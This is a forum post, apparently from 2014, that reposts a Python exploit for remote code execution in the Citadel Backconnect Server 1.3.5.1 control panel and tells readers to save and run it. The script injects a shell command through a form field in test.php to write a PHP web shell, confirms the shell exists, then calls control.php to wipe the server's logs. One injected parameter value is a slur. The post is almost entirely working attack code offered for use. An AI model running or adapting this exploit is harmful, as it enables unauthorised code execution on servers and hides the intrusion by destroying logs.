Citadel Backconnect Server 1.3.5.1 Remote Code Execution 07-10-2014, 02:25 AM
#1
Citadel Backconnect Server 1.3.5.1 Remote Code Execution 2014
save and run exp_ctd.py
save and run exp_ctd.py
PHP Code:
import urllib
import urllib2
# Citadel Backconnect Server 1.3.5.1 Remote Code Execution vulnerability
# Work only on windows box
def request(url, params=None, method='GET'):
if method == 'POST':
urllib2.urlopen(url, urllib.urlencode(params)).read()
elif method == 'GET':
if params == None:
urllib2.urlopen(url)
else:
urllib2.urlopen(url + '?' + urllib.urlencode(params)).read()
def uploadShell(url, filename, payload):
data = {
'b' : 'tapz',
'p1' : 'faggot',
'p2' : 'hacker | echo "' + payload + '" >> ' + filename
}
request(url + 'test.php', data)
def shellExists(url):
return urllib.urlopen(url).getcode() == 200
def cleanLogs(url):
delete = {
'delete' : ''
}
request(URL + 'control.php', delete, 'POST')
URL = 'http://localhost/citadel/winserv_php_gate/'
FILENAME = 'shell.php'
PAYLOAD = '<?php phpinfo(); ?>'
uploadShell(URL, FILENAME, PAYLOAD)
print '***91;~***93; Shell created!'
if not shellExists(URL + FILENAME):
print '***91;-***93;', FILENAME, 'not found...'
else:
print '***91;+***93; Go to:', URL + FILENAME
cleanLogs(URL)
print '***91;~***93; Logs cleaned!'
# 9111FFA1CB560CBD 1337day.com ***91;2014-01-02***93; 43A115C3EB64CD0D #
source:- http://1337day.com/exploit/21720


![[+]](https://sinister.li/images/modern/collapse_collapsed.png)